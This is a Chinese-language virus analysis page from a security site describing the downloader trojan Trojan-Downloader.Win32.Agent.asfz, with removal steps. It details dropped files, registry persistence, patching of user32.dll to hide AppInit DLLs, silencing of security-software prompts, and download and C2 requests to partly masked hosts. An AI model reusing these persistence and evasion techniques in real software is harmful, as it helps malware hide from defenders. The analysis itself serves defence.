栏目导航: 首页 > 漏洞预警 > 病毒预警 > 内容

Trojan-Downloader.Win32.Agent.asfz病毒分析

www.hx99.net    时间: 2008-12-04    阅读: 次     整理: 华西安全网

  • 病毒标签
 

病毒名称: Trojan-Downloader.Win32.Agent.asfz
病毒类型: 下载者木马
文件 MD5: 616FD070E842ECE173677C6A618D7712
公开范围: 完全公开
危害等级: 4
文件长度: 53,352 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0 [Overlay]

  • 病毒描述
  该病毒为下载者类病毒,病毒运行后,衍生病毒文件“manun.exe”到%temp%目录下,并调用API函数打开manun.exe病毒文件,拷贝自身到%System32%目录下,重命名为:“aston.mt”,动态获取urlmon.dll并加载该动态连接库文件,判断%Windir%目录下是否存在“ynh.dx”文件,如存在则调用API函数结束自身进程;如不存在则创建该病毒文件,获取%System32%目录并删除该目录下的“paso.el”文件,拷贝自身到到该目录下,重命名为:“paso.el”,动态获取API函数,连接网络下载文件,并将下载的病毒文件保存到%temp%目录下,修改本地hosts文件劫持多个域名连接,病毒运行后删除自身文件。
manun.exe行为分析:遍历进程查找“winlogon.exe”、枚举内核模块,将%System32%目录下的user32.dll拷贝一份到该目录下重命名为:ppdcn(随机变化),修改ppdcn文件数据,拷贝%System32%目录下的ppdcn文件到%system32%dllcache目录下,并命名为:user32.dll,拷贝%System32%目录下的ppdcn文件替换该目录下的user32.dll,完成后删除ppdcn文件,衍生病毒文件nvaux32.dll到%System32%目录下、修改注册表、添加注册表启动项,调用API函数动态加载nvaux32.dll病毒文件,使部分安全软件按扭变为安静状态、不弹拦截提示消息,试图连接网络的提交数据。
病毒随机修改user32.dll中AppInit的前两个字母,利用修改后的注册表关联键值启动病毒文件nvaux32.dll,以使安全工具无法通过AppInit查看被加载的DLL。

  • 行为分析-本地行为
 

1、动态获取urlmon.dll并加载该动态连接库文件,调用PathFileExistsA函数判断%Windir%目录下是否存在“ynh.dx”文件,如存在则调用API函数结束自身进程;如不存在则创建该病毒文件,动态获取API函数、连接网络下载文件,并将下载的病毒文件保存到%temp%目录下,修改本地hosts文件劫持多个域名连接。

2、文件运行后会释放以下文件
%system32%driversetchosts
%system32%dllcacheuser32.dll
%system32%xyyxzf
%system32%nvaux32.dll
%system32%user32.DLL
%system32%fxe.sp
%system32%aston.mt
%system32%paso.el
%system32%twext.exe
%system32%twain_32local.ds
%system32%twain_32user.ds
%WINdir%ynh.dx
%c:Documents and Settings%LocalServiceApplication Datatwain_32user.ds
%c:Documents and Settings%aLocal SettingsTempmanun.exe
%c:Documents and Settings%aLocal SettingsTempres.exe
%c:Documents and Settings%aLocal SettingsTempB040.tmp
%c:Documents and Settings%aLocal SettingsTempldr.exe

3、修改注册表、添加注册表启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit
新: 字符串: "%system32%userinit.exe,%system32%twext.exe,"
旧: 字符串: "%system32%userinit.exe,"
描述:修改注册表使用userinit.exe启动病毒

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindowskbpInit_Dlls
值: 字符串: "nvaux32"
描述:添加注册表AppInit_Dlls启动项

4、将%System32%目录下的user32.dll拷贝一份到该目录下重命名为:ppdcn,修改user32.dll文件数据,被修改的数据地址为:00872C38数据为:"AppInit_",修改后的数据为:"kbpInit_"(随机变化),衍生病毒文件nvaux32.dll到%System32%目录下,拷贝%System32%目录下的ppdcn文件到%system32%dllcache目录下,命名为:user32.dll。拷贝%System32%目录下的ppdcn文件替换该目录下的user32.dll、完成后删除ppdcn文件,调用API函数动态加载nvaux32.dll病毒文件。

5、使部分安全软件按扭为安静状态、不弹拦截提示消息,试图连接网络向http://m***.ru提交数据(未实现),使以下安全软件操作按扭为安静状态不弹拦截、提示消息:
lspfix.exe、kavpf.exe、zlclient.exe、zlclient.exe、avgcc.exe、zlclient.exe、outpost.exe、zlclient.exe、avgcc.exe、kpf4ss.exe、kavpf.exe、mpfsrv.exe、kpf4ss.exe、mpfsrv.exe、avgcc.exe

  • 行为分析-网络行为
 

协议:TCP
端口:80
连接IP地址:77.221.133.***
描述:连接IP地址下载恶意病毒文件,发送GET信息请求下载以下病毒文件:
GET /.c/res.exe
GET /.c/o/ldr.exe
GET /.c/o/cfg.bin

协议:TCP
端口:5613
连接域名服务器:garbage2collec***.net:5613
连接以下地址向该地址提交数据:
POST /sm***/dasis.php?btn=a_738df22c9ca04_000eb561&q=O33B
POST/sm***/dasis.php?zip=a_738df22c9ca04_000eb561&type=1&name=16843523&q=O33B&item=0&id
=0&rdp=0

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
     %Windir%             WINDODWS所在目录
     %DriveLetter%          逻辑驱动器根目录
     %ProgramFiles%          系统程序默认安装目录
     %HomeDrive%           当前启动的系统的所在分区
     %Documents and Settings%    当前用户文档根目录
     %Temp%             Documents and Settings
                     当前用户Local SettingsTemp
     %System32%           系统的 System32文件夹
    
     Windows2000/NT中默认的安装路径是C:WinntSystem32
     windows95/98/me中默认的安装路径是%WINDOWS%System
     windowsXP中默认的安装路径是%system32%


  • 清除方案
 

手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1)使用ATOOL管理工具中的“进程管理”结束manun.exe进程

(2) 强行删除病毒文件
%system32%driversetchosts
%system32%dllcacheuser32.dll
%system32%xyyxzf
%system32%nvaux32.dll
%system32%user32.DLL
%system32%fxe.sp
%system32%aston.mt
%system32%paso.el
%system32%twext.exe
%system32%twain_32local.ds
%system32%twain_32user.ds
%WINdir%ynh.dx
%c:Documents and Settings%LocalServiceApplication Datatwain_32user.ds
%c:Documents and Settings%aLocal SettingsTempmanun.exe
%c:Documents and Settings%aLocal SettingsTempres.exe
%c:Documents and Settings%aLocal SettingsTempB040.tmp
%c:Documents and Settings%aLocal SettingsTempldr.exe

(3)恢复注册表下项,删除病毒启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit
新: 字符串: "%system32%userinit.exe,%system32%twext.exe,"
旧: 字符串: "%system32%userinit.exe,"
恢复注册表旧值

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWindows kbpInit_Dlls
值: 字符串: "nvaux32"
删除Windows键下的kbpInit_Dlls键值

(4)恢复hosts、user32.dll系统文件
使用记事本打开hosts文件删除被劫持的域名及IP地址,user32.dll文件可以在其它电脑拷贝一个文件覆盖%System32%目录下的user32.dll文件。

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭